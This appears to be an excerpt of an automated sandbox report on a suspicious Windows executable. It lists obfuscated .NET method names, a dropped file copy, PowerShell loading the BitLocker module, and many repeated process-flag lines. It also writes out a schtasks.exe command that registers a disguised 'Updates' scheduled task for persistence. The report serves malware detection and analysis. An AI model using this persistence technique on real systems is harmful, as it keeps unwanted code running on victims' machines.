                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, VaZUh3SsMeAhplRM43.csHigh entropy of concatenated method names: 'RFi1E1Sdg9', 'FlV1K93LYC', 'RDX12cFZtq', 'kcY1nqIlYn', 'cYn1kGugck', 'i5L1AUu8hX', 'vVp1SxapUF', 'X9L1eXhvKL', 'ipR1hiyRh6', 'S1a1LoT5aG'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, TVTsHyVh9E8nWg1aXa.csHigh entropy of concatenated method names: 'TwxSy4kxva', 'b1eS0qXYPA', 'FDneUEmcpw', 'J87eRl7ODk', 'ErKSi2NABD', 'm6TSYJ8N6t', 'P1uSZ2CZak', 'jCYSJ9HA0s', 'mAHSXIGPG8', 'jL0Sx9XCBO'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, ua5doSJ7xEFnqoqZ3t.csHigh entropy of concatenated method names: 'QeOpZq4tJ', 'JlYET9xkU', 'h4QKAP3NJ', 'XEi70H5lp', 'NOLnuBEVp', 'PYDqYgnYR', 'oKg3Da3te2RM3vKF2K', 'wpb3YEP5oxiNTi2ynd', 'hqCepcruq', 'x2CLYN6sC'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, XNS3vO9VxiNDvVjZ2y.csHigh entropy of concatenated method names: 'jjhgOH5kKq', 'mBVg1SdAhU', 'uawgWd0rsE', 'rfgW07mo97', 'exMWzfiAaP', 'oIIgUdnkpt', 'hyXgRLWrZs', 'CgSgG48xmU', 'F8Tg9q83Fv', 'M9egopu05F'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, bYiFRZ3d8t9GXJpa0hg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SGWLJp28tK', 'vYgLXX1OvJ', 'H8qLxWnffG', 'EwPLNeRuPq', 'NKGLbnEwfd', 'D5hLvF91Tf', 'YUjLMcZyw5'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, jL7RclWwY3ulO0Zff7.csHigh entropy of concatenated method names: 'Dispose', 'vgBRVS5UEP', 'm29GfdE9c7', 'eKyttr86Bq', 'LKSR06YuE8', 'ErRRzMJNo4', 'ProcessDialogKey', 'cweGUo1rYP', 'ihtGRWTAf8', 'kEmGG3IF1k'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, Rg4Hth3YWlcNWQjCSnN.csHigh entropy of concatenated method names: 'Yjlh4wd9JJ', 'c51h6uDUZl', 'B3OhpTC4PR', 'bYqhEm88YB', 'm30hHYVeBh', 'lkRhKEUmWU', 'CcXh7fnrh6', 'HAOh2ZW3A4', 'CwvhnBjdOu', 'wXBhqTw49N'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, hBQirUUkqhh6Jbx8WV.csHigh entropy of concatenated method names: 'ToString', 'DQXAiFMEHw', 'ewWAfy8Hdx', 'nuGACaq6Ob', 'WoVAQuF4MP', 'PheAukTI50', 'xgKAjn18PP', 'qBwAPEkHGS', 'aXfAc3mVkt', 'XiSAIql2Yq'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, RoS3anzlodaHo4f0kx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Kcpha5xCKa', 'pKMhkKPWlJ', 'MD7hAuLFQP', 'dvrhSJo14i', 'vGhhegOCs1', 'sxPhhO9dFb', 'PAohLXBLnd'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, GI6qPVywYa6hUIfxPh.csHigh entropy of concatenated method names: 'V1hg44HuJl', 'dygg6KUpZq', 'MC2gpJYnd0', 'lFXgEU2ERp', 'Jy6gHf86Om', 'y3ogKxJKju', 'a8Jg7mRWQl', 'DAvg2CIvvh', 'zMbgnoRmct', 'rlNgq9myNP'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, yXhJbKosLlKpW8rNLB.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xYhGVfTJV6', 'FHEG0cpLwZ', 'DXhGz16LZp', 'lR79Uk5kfF', 'xs69RbWtoF', 'M8u9GfQ99K', 'IZk99geNe0', 'PBARhyeypwUqAMOEAj3'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, Tlmb0tBy4UyoTJGQIH.csHigh entropy of concatenated method names: 'ikTRgGGyXn', 'vOkRBuoxRH', 'F97R5SNlyl', 'MfARdFVRtg', 'eXQRkChPex', 'S8MRAb2WER', 'AAaLeKUO2TjFLj1GD4', 'YsOXJIwIbTm45ig1Gv', 'CAMRReNyyi', 'IWiR9TXOfb'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, RnrwAqRj72ywa7Gpgw.csHigh entropy of concatenated method names: 'K9prHPZAN3', 'oOar7g68J1', 'x3Z1CVg2NJ', 'G9Q1QpQRVH', 'nnF1uCxFJS', 'tPp1jZoKfS', 'EFx1PPo2hE', 'SGb1ck5DoX', 'Xtv1IdmJmv', 'kJc1FP60ps'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, okO7TJK9dCinF3LmXR.csHigh entropy of concatenated method names: 'qgRe86Wch3', 'OIPefmicdy', 'cDoeCvUklp', 'v1YeQEgPQ5', 'AZ9eJWQgkC', 'tDWeuouigl', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, eBNdtB6YbfWXnOO34y.csHigh entropy of concatenated method names: 'F6yhRQDBtL', 'ftXh9yOOwp', 'F0HhoKLI8t', 'bIehOyoQT1', 'pexhTGcMqq', 'Yyuhru0FOb', 'V6JhWjJqUU', 'EfpeMZZbi7', 'tKney71S21', 'Y9neV0Unof'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, wvggNWtakVgut5bwxI.csHigh entropy of concatenated method names: 'dcekFwM2Gr', 'qcykYs8wnd', 'RGskJD8oYt', 'AjIkXZ0p3K', 'f9bkfLg77S', 'LtbkCQXhYk', 'PfdkQLuxQN', 'kodkuN7rpp', 'r8FkjrUiNr', 'z00kPpLFsa'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, QPjoRCFxAbeZCiTRbI.csHigh entropy of concatenated method names: 'M0uWwxcl8v', 'YkUWTys6ee', 'FHTWru6lvx', 'keoWgVoDPT', 'E6RWBkFoot', 'Mbtrbw5i0F', 'aghrvU6Zyc', 'CrJrMCQxcd', 'MaLryk6PxS', 'WVDrVmwulf'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, PMi9hoic7ZJQUNCSpP.csHigh entropy of concatenated method names: 'aUQa2x6VWD', 'AKxanL9f5Q', 'Fqia8sIRRs', 'AkGaf0JFL9', 'sOCaQLUCNZ', 'LS2auSsLvE', 'MMbaPK8SoW', 'WZBacv6YiD', 'QBeaFNYo8U', 'g5Oaiqv9JB'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, CSOZU5vUWRw9E4Q4d3.csHigh entropy of concatenated method names: 'k5mS56vfUP', 'kjlSdtR0cX', 'ToString', 'Gb2SOEwuRR', 'KuPSTDa7ju', 'a46S1pqmte', 'utvSrSLkTD', 'lYZSWxOOQQ', 'yMeSgL5OaW', 'u3rSBaNIhM'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, WeRTmg58MlbmW9GQYv.csHigh entropy of concatenated method names: 'NqKTJ325CM', 'tnwTXAnDdR', 'KALTxcjlQT', 'V2dTNXnZf8', 'bXkTbwZJAV', 'MkUTvGNGsP', 'YIUTMIrnKt', 'SkxTy3F1t3', 'bjYTV4BaY6', 'ic9T0LgjIg'
                      Source: 0.2.z1E-catalogSamples.exe.44a8310.3.raw.unpack, qf3KIIPkQkHyoPCAGD.csHigh entropy of concatenated method names: 'c2d9wHtSmJ', 'XS69OIMOWH', 'ghN9TbGxmW', 'D6c91Vc6Gy', 'cnn9rV4Ylw', 'K9K9W6FxYE', 'qF89gVT2mY', 'q7N9BLQtl4', 'bmv93ww16i', 'Phc95tV7vX'
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeFile created: C:\Users\user\AppData\Roaming\vZkoWbol.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
